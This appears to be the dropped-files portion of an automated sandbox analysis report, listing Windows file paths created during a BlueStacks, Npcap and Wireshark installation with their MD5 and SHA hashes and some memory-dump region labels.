SHA1 9efa8f2e5a0312e83f737929765a86112a874272
SHA256 979c4336b428df84e37a2a51a7c5f311ac33ef6e4edc309c138ab2866dd065c0
SHA512 1beb3c66c5b4f9d128e8badcaa8b9dfa9908d74ea910c40a7cde8be3b9b704525e7ddf1e646013cfecf7c66585975b8a8e640b43b27771335bbaa90158f45d01

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\nl.pak

MD5 884f7faf0e79d04c6536506d6f95eab1
SHA1 39334913aa447b35012a8d7100e7f91e805c7e9d
SHA256 b4d9d873df0ab126f4a312755fde331d4d246519f1757f32087b36714ef4249f
SHA512 77a4379e148c7886950b92bdf8959c12c8695b7121be89142f4d4190cf32c43b8accb77f0c40718cd3c7e3ac0f90e99f3dcf5992140a5769821fc2adac988e18

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\nb.pak

MD5 5c901b43287edab65f05464dbad3e301
SHA1 d76444677a7eeafdfe0bc27a0ff892f028144d67
SHA256 0bdd86ed3444e7e5508dfe4ec483673c2744925accaa5529bff4037cd1b0c2ed
SHA512 46fbe41905a44fe034f3b0798459a2b5bfb4ac408bb90fb5f0f9e82c91407e4b6eddaa82173c0926784881acee514da71284ed02decb49d99cb235784d072da2

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\mr.pak

MD5 f40f6817a07049b8589310b7dba04534
SHA1 93afea27adbd165aa1e3261cb67d5ab719ea02db
SHA256 5429e2696d32638253c4372cc427b3fa154d7c997dc13aab90411fdf98c8f6d3
SHA512 450039cebfebd9b5dd012c2980587e78b64e777bb2ed7cebd1f3174b5e88f0a018cbd60af18ef3eaeeecf9729b420a0216a0b167867be4a2814744217bbf84e6

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ml.pak

MD5 df01088842b8c05568fce402a69bb595
SHA1 4b97c244ee85efb9c35b69f65f64d9cfcb2d25aa
SHA256 9f1fe59eb3d0da8d36715d63da958b5773ced3967e04c5314b3d5aaad2f3c579
SHA512 b434a12884f7a1d417c02de2fd27955e6af2329d8d8d0db9781675a16396556b89e2f46dc951e070c4077073e126d492a5db7a077b7ac3b1f80fe4fab4d68125

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\lv.pak

MD5 17b9ff8c299fff962e9b9bc0d5f2f15b
SHA1 6224d9bf81c4771033e14477da0a652336326036
SHA256 7e4a42d3cc06b7c9cfebad08391de3a275ec129ac20d36ec90ac136ee88223f0
SHA512 8bd3f102b933b94cd0da09e77c78369a156e2ac22f29888ac0c9db8d9d4e2a7e4eeac99942ae7a8785c6207a0277c374c1727712a932922c10646e3fec609963

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\lt.pak

MD5 7769b6273b1519ea1a8ac9f059e78c93
SHA1 6d8807f4af484041bac83d5d8873d639d5f07d0e
SHA256 e88897c766d8746b9ad859123742dc84b4dc9e6bd05d10a9262b15055a67758a
SHA512 9c91942cb73bc0c2dfdd94a93759520d9a3ac7f6b43ac826d00d2ff46c6335ed87126024bfa955e9c9e744d437a832188d66ad238ae66378a23210b9d1e740ae

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ko.pak

MD5 2a0bc83152bfbc0f365d3a85fd1e1832
SHA1 9b972a8e823ff6f161ca2aadac11043b054b3146
SHA256 ae1cdf9a4cef3a86d3550f7501e5c650cc1e0924c9ab84900df702ea7e351f8f
SHA512 2c3ae97d3c78310cafe92620c0438dde4c624353cd682f3087c92050870d768e6f7071248e55d03232739a2dd94c7694975b0b329f1ffc6148221a18effa9088

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ja.pak

MD5 9705a8fcead214aa619f1be816135ea0
SHA1 f10d22cdbf5d7960aeaa13c98cf8f7de41034760
SHA256 c8db5560edd42f1a6acc4efd10865ce39c15dadd3b7dbdaaa28922e1f9c86320
SHA512 6d82ae6023e48ef54d6903a13b6f07069fdd5c87aa0e7b1219c0797bf49cc789170b3677d572fb1b63feda138e624f71e7175022eb7928db0dd413cc8652c6af

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\it.pak

MD5 56c13472d7efdb4466d5189af2d06ce6
SHA1 84025c148e10e1885125893dd286d0f9e751e101
SHA256 7114d3e0c7de30f25c789a1dcc7c50e85985b8ff35afce4600128e85318b4af4
SHA512 fa9b17d387585a281ef1582b8596cb61dc79658bf3b121f6fb6355bd6584c517d938e21d1a0b1be6491c01e5c15c2da666d9f77000a12a2da137c040046957f8

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\id.pak

MD5 fc2cd7f4af1976579f6b0eae3ab2d874
SHA1 c4e434b9d0d95a505947c97d396b05c9a18f3983
SHA256 48b670c94216623a0c81ad611cc3b47a47dc9368215e065fd02448b4ebf808ef
SHA512 9e355bcfcc31535755233cdd7a521b0bc68f897d85a22da658e3fe5bfa388ce8d8dfa7c01087ea04cd268d44d43862c5acf5b305e45b4572dcb25884e45a4535

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hu.pak

MD5 3c70ba470c8503cae9407540d070f506
SHA1 0b841228d28e8605c37df79f1a3714402d2b18df
SHA256 0770854f32f041df5ee0190164aa24a1ad06e199c79efd46f3ab65e12129023e
SHA512 ded69524127431d1b6a68bcf85119079a57d3aae5c5be7fd8f215090ecc74570b899e8ec70d6cf74da49833d903f8ec2cbb06738a1c917efc5e19a44167183c1

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hr.pak

MD5 a621446d9e94b0d47935bf3310c385b5
SHA1 5cb954846bd2a2c477cb28b99545cd9bc0fbe990
SHA256 93f7fbaf2c7e5f52187fc4a2b5726387e84decebd1efd8b922665bb831e5b842
SHA512 80c5ddea81bf8d1721a2c6cf094cb2c99a10a9aa443193bb2942360de9783da75292eaa341711700281626cc0c8a8f9dc071bd8bb589444f764ea307c4b9de37

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\hi.pak

MD5 61838bdf13a1d60545d15e9cc49866be
SHA1 64bec7fe42caf53f192b58e4e5b068e56d835cec
SHA256 9a399dd9dac62ea30d700f94e83dd79d54827eac8b9cbce0343ad2dc0f4809a1
SHA512 7e9e0c3aabebd6f0c221918b6790d096824ee1c5f7338a21ac489952b8260b1e59be423005ce34bd5039cb38fa7c9197cf48b77974ed8f6b7ab2a2472e3daecf

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\gu.pak

MD5 e245057bea15117bed15bc3ee2911d74
SHA1 c8e2d5f85a974fa989c0d0f64121d2836a13bb84
SHA256 4ea64678c7c551c2b2088b9417bcc76218822f3213e9b8028d618864035b97a5
SHA512 a72a1c259332f279f976403034c9d2356a437a1677c0e20c243f23ac246a8ab65bf150a610867687eef48a0b7c87d23f0e357ef21bb1791386790243803ee70f

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fa.pak

MD5 f913ea1db8c9c99bff701ceeaf8138f3
SHA1 6bef3ff865b3a95dc1900ba3c94c5bf556c695a1
SHA256 b4e0d3f7cb858ce12b5a75a71ef14f2a36494cd4138181b29f6fb3d6bd386c4c
SHA512 edca9b945c6dc90586f6d20e73316f620d5fff61f3ad4fd35c7e9064f55b1988cc77d372a97d100cbf572a2906cd193777a18ace98fabadea1604df42c8823a5

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\es-419.pak

MD5 f21b0783d062082ee46aa573eff68df0
SHA1 84f62d15eb68858245e56bef0cf317e273918044
SHA256 859cb8ad8666e97a47f0e24df4ae85aad80002fbf842b4e68afd0a308d6597fe
SHA512 d87e2d51cedba8ba4eba3b0fd390bfb32b25c5cda98a0d6465b5ae351dc745a67ac174c223e7def8b02c9f00729244026e895791add2611680579dfec4b7b07b

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\en-US.pak

MD5 1e958f35257ef1e2e5115d860602a593
SHA1 688afb781ce3c4c9a55fee9696145260d2ce1400
SHA256 4a65112f4d03cf38abf2ccff5e3fe8e161cb3e47d588b510504007c9bb876b37
SHA512 a996e8708f4e92794cf3eb6b7780d9ac8e567b1359aface4fd50d427630e4219678f4cdcd58764123ab6baf12a9c87a08b6ba5767fa8f6042a7319fb45b72a27

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\el.pak

MD5 26afc001a706679413f5deaa3c6603e4
SHA1 c9d780d930775cfc17cf9160712a2e90ca55106e
SHA256 4c2a3552e84fdd08852073d25c99727c4270160260d159572715c7d37e5861bc
SHA512 743380b99f6d55ad892296e8361b74cf90254403fef15de37c3e5fc302bae2991f5bb4ae21ba84bddc30da3b5b31fb4e741b0c524feede1656bcd2d531d76ea1

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\de.pak

MD5 01cc5b8a05a435482dc692baef032d3a
SHA1 229a4d1c9aea9111bb46895d096dfcaf488b8d4a
SHA256 53d5743a2606d6b553e8dbff871f2f1d3d53666baeb9ecca5b1ed624d48d5835
SHA512 082654e8385811d4e0f35544c017704b0f13638f850947d76c9abe093333fdaf9d1d08c184bb8107d16b0eae6ebcbe0c522ed18138dcee30a71d9d75ea8c3488

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\da.pak

MD5 5eba7377be8e34dd03db766300039ed2
SHA1 b3460fa050b93454b9e05586d86d7cf67881f557
SHA256 94157ad608b35b29dd176a3106caa4613ed6d4c20268ce00ac4ccf13a9950f94
SHA512 7d24210b60fe38b42fc6a4437ffb1e06333b7084025efe462b66e086cdee953254a1d6fec69ab3c8569118156f3a4a957aed5259e1432772ab46cf7905aa4385

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\bn.pak

MD5 304432105fbe28b1625f0d7b6be3e7bf
SHA1 2d5474854bc0bca3f3ead1b9199d76ef533f0850
SHA256 ac282f17c5f25b55d368d06b305b89b614949d41c2a1377f1dd5aecb57d1ca8e
SHA512 8ab35cf2069f70a3a99dde98a7b7782821000abcefa97eaeb07b8a717d26a7b6c5461d5bcd39110b47db98aad9c56e463ca2707b7e6b71cda1092b8cf3a91ab8

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ar.pak

MD5 143ffa8ca3ac0e6dca9a8b3e8ba3f3f5
SHA1 6186940350b3fdd936f6ce41f3091bbca397e9a2
SHA256 3f35466a80f4ca5a5167b2d3a3278e75afd90821206ac98801210a2117c913e2
SHA512 a12b5e3ae821e08aa76657cf84bd79def6f8fdb413e908b13944f6c2bc1aa9724193d0a9a0abd5dc0b87e0845d61b021d39024a5048443531dafa19de707944e

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\am.pak

MD5 2a8ca8692a60fe8d33d51d99c9084a9d
SHA1 919d8adacce240fd394d6faf2aa41d2e5b8460ec
SHA256 73f0a7c7632313613814b3ccf5962962aff99de940e084e0b609ecbad1ec1d44
SHA512 080e56cce041226592e7fa816fe8c5e362a1f172a8c671bda4092ff127f0cbe8238c40d41751099f6bac8f02c71faccc011df270b1c1bb8b772286ab95f5f1ea

C:\Program Files\BlueStacks_nxt\resources\qtwebengine_resources_200p.pak

MD5 de5e6a97c80d698256369b10255ce45d
SHA1 8d4b979a8c2ee33c2dbc01ed13a165b455a5fdfc
SHA256 669f9d3388438377c440419e5c62973362e33e84a5b247ddd0dd4568da75eb13
SHA512 5609ca5053f581e636c0fe10def704f076c7acf5d958e235991fec32a2ddebd72b312f36a6648d2462766d1cb141f3df12d39df1a344e0dfb4a9e2946dcf1206

C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json

MD5 b5a03fbea2c3d33b0ae7bceb5dfc6db2
SHA1 6e517cdd11cd66c23ca62f6b983222df7301b987
SHA256 4354b14b4c4913c21baf1788b18f2af2ea69d0536df9a81c3139de04bae03d72
SHA512 da16ec70ee1e37a21b41877b732d3bb71216d18b78cb5cdf3157656986d9417d4db2aad541adcea0b48d938297a5c40200e52352980a7ae83800990a3009e40f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1

MD5 980046069eba5917dbf35ca3739ae5e2
SHA1 1d1d96b93296ef7f6ff59371c612eac239fc7e7b
SHA256 61e9d12dfe01a49708831c75a14f0ac54c4a164de5d9877a931f04a1a6bd6214
SHA512 fce2b6e81a9060bf713fb6dadf6225c333d9e67dba7e2f0f665fafa20892b9bfb0fbf94ba0f14c752092041f20d1096d5dd2a184be45476e9094f789f30326bd

C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\InstallOptions.dll

MD5 d095b082b7c5ba4665d40d9c5042af6d
SHA1 2220277304af105ca6c56219f56f04e894b28d27
SHA256 b2091205e225fc07daf1101218c64ce62a4690cacac9c3d0644d12e93e4c213c
SHA512 61fb5cf84028437d8a63d0fda53d9fe0f521d8fe04e96853a5b7a22050c4c4fb5528ff0cdbb3ae6bc74a5033563fc417fc7537e4778227c9fd6633ae844c47d9

C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\DonatePage.ini

MD5 215fcfd443b817250d834a83fbd3490f
SHA1 7c8b27fb2524261649479278cbd72f7fef11a00b
SHA256 4988ff1b435fdffe6f96c1592cc31d039a75115dbd780f8dd1abe9382ca71c6e
SHA512 03911c975a8dc63e4dee02ffa7492dc67f4a8c2ee7c450e61bb4da202d42ccd16069b172be12127d8d9da1d75cf69d07182952c83fdc0e0665bd769a5a372ade

C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\TransportSecurity

MD5 93d6b5520e67ac200910c5fbef9b8168
SHA1 769d7d62d06dff6513de69d17a38b9e659dec4ae
SHA256 7ca58dfd001e6f98cb93c647667d38aac3ad1dfaa1a078d2c6573fad5a019616
SHA512 cab0a12b9790d22b11fc874cc4303d7f3a8db2e276a9c493fe61a5873f0e2237206fc1489b4283e9a75e079e49ccbeccce08079f019345f042446eb1473a8101

C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\TransportSecurity~RFe66332c.TMP

MD5 1ba4b9896b48fb3a13227944b6469e47
SHA1 8bf4d207ee77fca3512c8d39d7e52ed8d9ce7503
SHA256 2917d75d207f1c2c948f21fd443f4c765678215434e487342f1dce12bfbf1782
SHA512 3aa6da4802c54deb51c8b0d205d50e4af56edc745d5dd779346b376af241c2bcc446fa078021e43b080814779db7731562cc09d330af73cba0fa215bffb5b7fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c7df8caabbe738c6c63baf912a5297a3
SHA1 cae6be14c22f21d97cd376c1b43d9b5ad8dbc7fd
SHA256 a3a2c1d109942e6866bedcf8f840eaf2d0890b59d7a6ea623c6eee94e3a25e0e
SHA512 cc344fe13d699b4d58df829acb053dc3a3817785ddd05fb14e3c848275622d25110c445237f9ffba77f867a5587f7c44def26e9c3f16e62a543f3d6abd72c957

C:\Users\Admin\AppData\Local\Temp\3lvshmuz.hpv\BlueStacks-Installer_5.14.22.1003.log

MD5 2041d6ab6a59ea8c8c7997205c4bf5d7
SHA1 4565862aa2093d746f5e85ac1f02d11530cb5778
SHA256 e912f6e54168c00a457563104a95ea193a315f8c9607bc3f49ee369681d68648
SHA512 ee36261a366871574e5cd009a8f20595800e84706840fcebe71a61aeb9169547322d99e69c77a41ceaee4a6827bc23e1405bee57e624ea4949d45b495ba33df9

memory/688-22647-0x000000001CE00000-0x000000001CE08000-memory.dmp

memory/688-22648-0x0000000020AD0000-0x0000000020AF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\NpcapPage.ini

MD5 6d92cfc906fb0684194241de46130860
SHA1 f1b71ec77becf094746fc2b1e5c7b8a06f4c8568
SHA256 eca18a27265e0c02a715cd107848253f8b4dd95728090f3f05a2721201bfe8cb
SHA512 4128cffdb1f9a94c37e5e800772c0214399ac164b0a8b92071c7215d937f80853a39f14e9ebd759b50d85b96c96efcb3ffd25a17fcea63cd9293dcbcadfd9a96

C:\Users\Admin\AppData\Local\Temp\nsi21BA.tmp\USBPcapPage.ini

MD5 e99e395d6bfc37663626c4a01c732692
SHA1 75813eb6682b97de44dafdd6f98afae7e4d3868b
SHA256 b4c5e164a7dc968941eab553a3c0f53f3aae8209b8eef74d4be9838b78b51503
SHA512 e13cf96693c5d3971fdb5b14ee25e629b7016b045719f59d451789651127323b0a260f6c085f0b746b64d04a06a4d408aafc20eb71635d6064d8584af20973f6

C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.ba\logo.png

MD5 d6bd210f227442b3362493d046cea233
SHA1 ff286ac8370fc655aea0ef35e9cf0bfcb6d698de
SHA256 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef
SHA512 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

C:\Windows\Temp\{C171BC14-EBD8-4819-A425-1258F93C1075}\.be\VC_redist.x64.exe

MD5 35e545dac78234e4040a99cbb53000ac
SHA1 ae674cc167601bd94e12d7ae190156e2c8913dc5
SHA256 9a6c005e1a71e11617f87ede695af32baac8a2056f11031941df18b23c4eeba6
SHA512 bd984c20f59674d1c54ca19785f54f937f89661014573c5966e5f196f776ae38f1fc9a7f3b68c5bc9bf0784adc5c381f8083f2aecdef620965aeda9ecba504f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentClosed\e5bd37e9-9f1c-4b62-94f5-2bf7611f6c81.tmp

MD5 a36e9e4606a1a5ee16ea8104cf1a5c7b
SHA1 e9fdbd0d5e058441e42da0a9443c10b08b4501a1
SHA256 226522107a0e534d988a5cdff6b410f66d4f26b03ce28ea915041920f7f4047b
SHA512 12ed66f9f12dcbac9bdfa98c5ec58ee6d6abe8327cde11fdde47e838ad0dfc21ae37f48d0bea85d6aa126553e560e2de0433151f6a5d2dd3223850423f931ce7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 4f3930e1505360e99a23398869ec89aa
SHA1 b3f0818fde20fdad48970c29e67f079eff48c06c
SHA256 bb5c7b0df52d93a8f3f2f4c98db0071199bcbdd33aa702ee6221c184638fb725
SHA512 a9ab87aacbde02eef61b0667294f73599f0c926d3956f43bd7db769b722c071eb7c514cb3f24ba88d567bb3e3c67319d736ee2bec6b335994c7a0cd39a1d6ed6

C:\Windows\Installer\e66ab1e.msi

MD5 a4075b745d8e506c48581c4a99ec78aa
SHA1 389e8b1dbeebdff749834b63ae06644c30feac84
SHA256 ee130110a29393dcbc7be1f26106d68b629afd2544b91e6caf3a50069a979b93
SHA512 0b980f397972bfc55e30c06e6e98e07b474e963832b76cdb48717e6772d0348f99c79d91ea0b4944fe0181ad5d6701d9527e2ee62c14123f1f232c1da977cada

C:\Config.Msi\e66ab11.rbs

MD5 1c07d196cca09c41018644c3e414614e
SHA1 b1efe939282843f0b5eb8b41d0dfbbab7d83d3b8
SHA256 174446bad36fb607662ac1752ca0d09af7ccdab1efff685c8520d5cf72bcd4ee
SHA512 de32dd0bc7dacafe77b6485291c057065a8b444cfed2b87801376b35ed51f4c4d8bc057ef37df64255408975ebb44ab1b10ec6633b04848e5694986b197ba951

C:\Config.Msi\e66ab1d.rbs

MD5 52dac1ebb88f8c9cdf70dd9db6246b9e
SHA1 f64df8503653893c96269899f9e76a55fae5145c
SHA256 992601c0a8e1a1cb7560d61880e4d8cbfd0390e4692860fe6e104c01fb624dc7
SHA512 5ad713e2442a03af947e1974c9d452f5bbfd53fde468d0c81befffd229a19fe09681807836af2f95a1eabe1517d7090c2c4539d80cadd2452aa9d8c0a7ee52e0

C:\Config.Msi\e66ab24.rbs

MD5 a798f628663fe4846adba701fd66475a
SHA1 e92a2dc469766ef0dc1045ae0b4ab13783960042
SHA256 70b111d16d7148fe02374efab1edfd2eacc407a6d75bfda1a17d5107a711c424
SHA512 9d506d812e58163175ff701db56deb49bb9aa980b1764ed747a5c7f2430ac454892241e721fae2ed9c59b9b87ec5dd0a652cc193a781717b90e96371d43ae18a

C:\Config.Msi\e66ab33.rbs

MD5 7d3c150c105f409a447433d93a402a34
SHA1 69de1e02ac8913e82c39d7c432deb0c6f40aa412
SHA256 7a89c77806e9d4f857f3e04fee2ff32ab5ff491dbb88f8d434bf6d4418e7968d
SHA512 8287adb0c1cd427394b5b13a54aadfd7520669a046ed59d5aee2159e40cf4e872e27cb31b6fa4c99a6b9b8ad5b5a24d19c36af0ea46a4328e82fae8e5d75e4b9

C:\Windows\Temp\{9FD00820-9D14-4590-865D-0A54217B3E88}\.ba\wixstdba.dll

MD5 eab9caf4277829abdf6223ec1efa0edd
SHA1 74862ecf349a9bedd32699f2a7a4e00b4727543d
SHA256 a4efbdb2ce55788ffe92a244cb775efd475526ef5b61ad78de2bcdfaddac7041
SHA512 45b15ade68e0a90ea7300aeb6dca9bc9e347a63dba5ce72a635957564d1bdf0b1584a5e34191916498850fc7b3b7ecfbcbfcb246b39dbf59d47f66bc825c6fd2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1f01a58f320a1bff2edc65e087e1b7a1
SHA1 a4e531452b7f7f14ae6eb97f1649f9b820a4c463
SHA256 255469fa50590eda2cda88d0a86d36c53e9894a84779ac021d37f10ee0b6064b
SHA512 ff9e7152e1a5f76f8a3a796f1e68130aa59f6ec71b8b3b65b744e379742155532f4c5d0e4d7b9266bfeb6810a7785004983236be28aa14622a9bd86fc98081a3

C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\InstallOptions.dll

MD5 170c17ac80215d0a377b42557252ae10
SHA1 4cbab6cc189d02170dd3ba7c25aa492031679411
SHA256 61ea114d9d0cd1e884535095aa3527a6c28df55a4ecee733c8c398f50b84cc3d
SHA512 0fd65cad0fcaa98083c2021de3d6429e79978658809c62ae9e4ed630c016915ced36aa52f2f692986c3b600c92325e79fd6d757634e8e02d5e582ff03679163f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a486d12d1ce484a21264c855ca0ee76e
SHA1 f800eb0a641e43d3b422dcea69a3f82faf0b264c
SHA256 07025b6049503e66f9063ee15b1ca25e0e61a964cd0a42ea459e36888de88d07
SHA512 615a0367165dfda880db652d6940c1f9d33d203f276031fb3b6181c3c2c42965e286f254c4acf6a9ca97eda81dc046d586e843aeb1b1f886d4f5ffd3e7a66dd4

C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\options.ini

MD5 4c03a565eafdd997f6d501d81e3ad3c9
SHA1 1a8e728e164148dc08c4b24242721e6ecf515812
SHA256 0f5a91ef783df6ea57ff35297d7a05f5cc6b38b04ff6f307eabb08be6484b43f
SHA512 fd1c34b3f5ffe51fd91ee82ad68b131918724e6b0b4b19947c17ad169bf3cd1bcd37d6fea36afac817929a9f74c13a65b5e1736de83af65dfdcd895f002e229c

C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\options.ini

MD5 dcc0f45027473dd400084b08c121550c
SHA1 dc81d4ca0bf622313a1162e0b5910fb11af45e32
SHA256 215cca1949bfa70606654a8d4b582d097773a01b6b464cf083b8a6361cf573f0
SHA512 39680bb01a60dd1a064548303d0ce30d34afb59cc3b066b54c1491b05222cb270bac5cbcd357ceed60bfee4a41aef4f0e0fcb6fdb3cb3c0b0028e8acaed2e1a8

C:\Program Files\Npcap\NPFInstall.log

MD5 ffb779c5bc447cd08c56d54d83565660
SHA1 ef94eff7a6b5f0f668a44fa30365cdb56fff92f7
SHA256 0a6ea38229234477614a2ffe99c7e70a4bfeb3118dd6dc1cbe1f4c8ea61ee35c
SHA512 9a9ee123b350af5390a1876ff9293473095033cedf01c5b9e558ac264ca498eefc82ce07737d5ef5b48e83b35cd071abc99c9267055b592e3a665ed4f625405a

C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\nsExec.dll

MD5 f9e61a25016dcb49867477c1e71a704e
SHA1 c01dc1fa7475e4812d158d6c00533410c597b5d9
SHA256 274e53dc8c5ddc273a6f5683b71b882ef8917029e2eaf6c8dbee0c62d999225d
SHA512 b4a6289ef9e761e29dd5362fecb1707c97d7cb3e160f4180036a96f2f904b2c64a075b5bf0fea4a3bb94dea97f3cfa0d057d3d6865c68da65fdcb9c3070c33d8

memory/2592-23978-0x0000000006110000-0x0000000006464000-memory.dmp

memory/2592-23979-0x0000000006640000-0x000000000668C000-memory.dmp

memory/2592-23980-0x0000000006B20000-0x0000000006B42000-memory.dmp

memory/2592-23981-0x0000000007DE0000-0x0000000008384000-memory.dmp

memory/2592-23982-0x00000000078E0000-0x000000000791E000-memory.dmp

memory/6092-23987-0x0000000005960000-0x0000000005CB4000-memory.dmp

C:\Program Files\Npcap\NPFInstall.log

MD5 35ddebe59829d892b949e6cbd2bcdd32
SHA1 58fecbd4010966be170ae26fa514470ed4fb4dbd
SHA256 2339704d6af0660833483a263dbe5378f9fea7e6a815d51137ba3c68c4406375
SHA512 fc64e878f089b6e8451d6a420110d8592f87a82cc85be1eabed7df62132be564e0fe3ed85e2194758efebf686cd471c798aab33bd061498f425b3218698a75bf

C:\Program Files\Npcap\NPFInstall.log

MD5 4ee73803764f107bdf43c7dea0d2cfd9
SHA1 f43a9c3560191c2eca8a0b4858694d65d4792da9
SHA256 8cc6b90c2cd296a603fe9f812e46d0cd767d533301fbb2522ca0c92b220d7873
SHA512 3aa908c32649e4b4aa76bc7e75df945bf3fdc8fc1e3c3e4bbb8e4e6a2c9f6a858579a217c43f7a546ef5a152cd44d84e22760c66aa077d5a62e3a9d8ce0f139d

C:\Program Files\Npcap\NPFInstall.log

MD5 8ffa46f69639b45cc96dcf82671e6925
SHA1 f74fb1884aa17b36bda1dad6bf9d5474575b97d9
SHA256 1dfbfe36a71cdc54f244d878119f2bd7134e53b6712a3ad53cfa40b21bb430f3
SHA512 6cf25a5c2692dcc77954d289229dace8df42936477f194a92f6f41a8ec87a37b1165dd74eed7fd76b8b3b93a1297d234798d6778dd9e1b0f84ae1f476ccacdf3

C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE393.tmp

MD5 56fc763587dae7a34a6c39ebfa44a58f
SHA1 ca5a73a1d59526e73809e13f2dc95a7738c36ad0
SHA256 98abb948f100c7d47c80141a058c869eeca59c357e42c1fedd4cd44140617ca6
SHA512 7bcd793d8b05b0c60c49a4cea34b7b885a0340f9ebee16f96051238306974bbdeed36d08bf83d88d64ae4fc7f37e8f7f7dbcae335bc5722269f8ea26954d7cfd

C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE392.tmp

MD5 16db6977ce750fa6cd3f9f7be93cc087
SHA1 b899075de2c186ec0fed298af470791025ab8fbc
SHA256 41c067a985f2770b9f1f38f0558d3661b333154e09022831de8a5acaf56c5b87
SHA512 b0941daba49451644293530a0a567d5621cab8b8e6a3a981da2a3079df21242529d3118fa9d2b956405e15319a0d690a4f37e9a6b8242ebe2b009a2d88ca63e6

C:\Windows\System32\DriverStore\Temp\{b3eee243-522a-9940-9ae5-75afc7ec1808}\SETE391.tmp

MD5 de72efb03052c07948619b29a991097f
SHA1 734b1c18a3f1d6367b274aca6aaa1c7af05c570f
SHA256 168e04bc04da8cc8fcd8e796682346efd5dc3a1fe7aeb6292b88b004405a25de
SHA512 11b16cd1e93b65a64c3ab03f15fdf789ee9b89cd2e04688238ad1584e8cdda49749b5ae772a54836cda05bba45097ca3863ece75a8ab3cb6a662541360040c24

C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\Network Persistent State

MD5 77aba481be128d312351bc5bc5b86d79
SHA1 e0a06488bd899835cc3c1105be48f0d6bf7ea6a7
SHA256 96994f9632d57fe655f9be0eba6da8eb3c12d1be791d03540ca7ba729a4acf3b
SHA512 26b96230474e83269137bd6a70ad6b6cec40de7bdebf01304fd28581e32612bde3c0e908bf693391c55b6ce398d1f72b4e36851d1d78a02ad2571de74885f0a2

C:\Users\Admin\AppData\Roaming\bluestacks-services\Network\Network Persistent State~RFe66e834.TMP

MD5 2800881c775077e1c4b6e06bf4676de4
SHA1 2873631068c8b3b9495638c865915be822442c8b
SHA256 226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512 e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\final.ini

MD5 cae757421db8d011e41266bfd9439885
SHA1 7108a9f0740ee4e3a118f6ac9212e0446f074181
SHA256 ff350a68202aadb145f590c8579f9284d2e3c324b0369fde39e5a3a31d7b8204
SHA512 785d19c796834065c823a7da99036378bba54b932ea1e47d4ba0c1d123a0a09ec307a3459fb862221de74ce61d9a8d7ec73901c9de007d31e7b39eb7a19b16b5

C:\Users\Admin\AppData\Local\Temp\nsiBB98.tmp\System.dll

MD5 f020a8d9ede1fb2af3651ad6e0ac9cb1
SHA1 341f9345d669432b2a51d107cbd101e8b82e37b1
SHA256 7efe73a8d32ed1b01727ad4579e9eec49c9309f2cb7bf03c8afa80d70242d1c0
SHA512 408fa5a797d3ff4b917bb4107771687004ba507a33cb5944b1cc3155e0372cb3e04a147f73852b9134f138ff709af3b0fb493cd8fa816c59e9f3d9b5649c68c4

C:\Program Files\Wireshark\Wireshark.exe

MD5 c122bd9e7b543d91715efee2bb840d46
SHA1 c93acabcb0c83d402c3f055d1299c73fe2741f5c
SHA256 7f1be9e3c1ded9704f4f2b7a580d96666d2182191f800eb5139c346bc41fb0b8
SHA512 ed09ce5c8bd001407ddec2dcbdb4e37ea3f234143942a3582b500404888012bcef2cfc224ec8273db0a5a2d0cc379d48b4955e1ce1b9b22d3a8229860a7f430c

